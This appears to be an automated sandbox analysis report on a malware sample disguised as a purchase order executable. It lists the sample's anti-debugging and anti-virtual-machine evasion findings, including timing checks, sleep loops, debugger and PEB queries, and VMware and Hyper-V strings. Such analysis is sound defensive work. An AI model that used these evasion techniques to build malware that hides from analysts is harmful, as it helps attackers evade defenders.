Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5636 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160 Thread sleep time: -48000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00409900 LdrLoadDll, 1_2_00409900
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_013E032D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf, 0_2_013D7FB0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h] 0_2_013FD014
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h] 0_2_013FD051
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h] 0_2_013FD0B4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h] 0_2_013FC520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h] 1_2_00F858EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h] 1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h] 1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h] 1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h] 1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h] 1_2_00FC90AF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h] 1_2_00F89080
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h] 1_2_010069A6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h] 1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h] 1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h] 1_2_010141E8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h] 1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h] 1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h] 1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h] 1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h] 1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h] 1_2_00FB2990
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051074 mov eax, dword ptr fs:[00000030h] 1_2_01051074
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01042073 mov eax, dword ptr fs:[00000030h] 1_2_01042073
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h] 1_2_00FAC182
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h] 1_2_00FBA185
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h] 1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h] 1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h] 1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h] 1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h] 1_2_00F8C962
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h] 1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h] 1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h] 1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h] 1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h] 1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h] 1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h] 1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104131B mov eax, dword ptr fs:[00000030h] 1_2_0104131B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h] 1_2_00FB2AE4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h] 1_2_00FB2ACB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h] 1_2_00FBFAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h] 1_2_01058B58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h] 1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h] 1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h] 1_2_0103D380
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h] 1_2_00FC927A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104138A mov eax, dword ptr fs:[00000030h] 1_2_0104138A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h] 1_2_01055BA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h] 1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h] 1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h] 1_2_00FA3A1C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h] 1_2_00F98A0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h] 1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h] 1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h] 1_2_00FADBE9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h] 1_2_0104EA55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01014257 mov eax, dword ptr fs:[00000030h] 1_2_01014257
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h] 1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h] 1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h] 1_2_01058A62
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h] 1_2_00FBB390
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h] 1_2_00FB2397
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h] 1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h] 1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h] 1_2_00F8DB60
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h] 1_2_00F8F358
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h] 1_2_00F8DB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h] 1_2_01058D34
